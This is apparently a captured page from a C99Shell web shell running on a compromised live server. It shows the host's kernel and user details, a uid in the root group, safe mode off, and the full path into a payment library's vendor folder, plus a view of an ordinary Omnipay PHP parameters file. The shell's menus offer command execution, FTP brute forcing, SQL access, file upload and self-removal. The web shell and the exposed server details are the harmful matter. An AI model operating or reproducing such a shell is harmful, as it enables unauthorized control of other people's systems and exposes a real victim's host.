!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/omnipay/common/src/Common/   drwxr-xr-x
Free 28.55 GB of 117.98 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ParametersTrait.php (1.96 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Omnipay\Common;

use 
Omnipay\Common\Exception\InvalidRequestException;
use 
Symfony\Component\HttpFoundation\ParameterBag;

trait 
ParametersTrait
{
    
/**
     * Internal storage of all of the parameters.
     *
     * @var ParameterBag
     */
    
protected $parameters;

    
/**
     * Set one parameter.
     *
     * @param string $key Parameter key
     * @param mixed $value Parameter value
     * @return $this
     */
    
protected function setParameter($key$value)
    {
        
$this->parameters->set($key$value);

        return 
$this;
    }

    
/**
     * Get one parameter.
     *
     * @param  string $key Parameter key
     * @return mixed A single parameter value.
     */
    
protected function getParameter($key)
    {
        return 
$this->parameters->get($key);
    }

    
/**
     * Get all parameters.
     *
     * @return array An associative array of parameters.
     */
    
public function getParameters()
    {
        return 
$this->parameters->all();
    }

    
/**
     * Initialize the object with parameters.
     *
     * If any unknown parameters passed, they will be ignored.
     *
     * @param array $parameters An associative array of parameters
     * @return $this.
     */
    
public function initialize(array $parameters = [])
    {
        
$this->parameters = new ParameterBag;
        
Helper::initialize($this$parameters);
        return 
$this;
    }

    
/**
     * Validate the request.
     *
     * This method is called internally by gateways to avoid wasting time with an API call
     * when the request is clearly invalid.
     *
     * @param string ... a variable length list of required parameters
     * @throws InvalidRequestException
     */
    
public function validate(...$args)
    {
        foreach (
$args as $key) {
            
$value $this->parameters->get($key);
            if (! isset(
$value)) {
                throw new 
InvalidRequestException("The $key parameter is required");
            }
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0032 ]--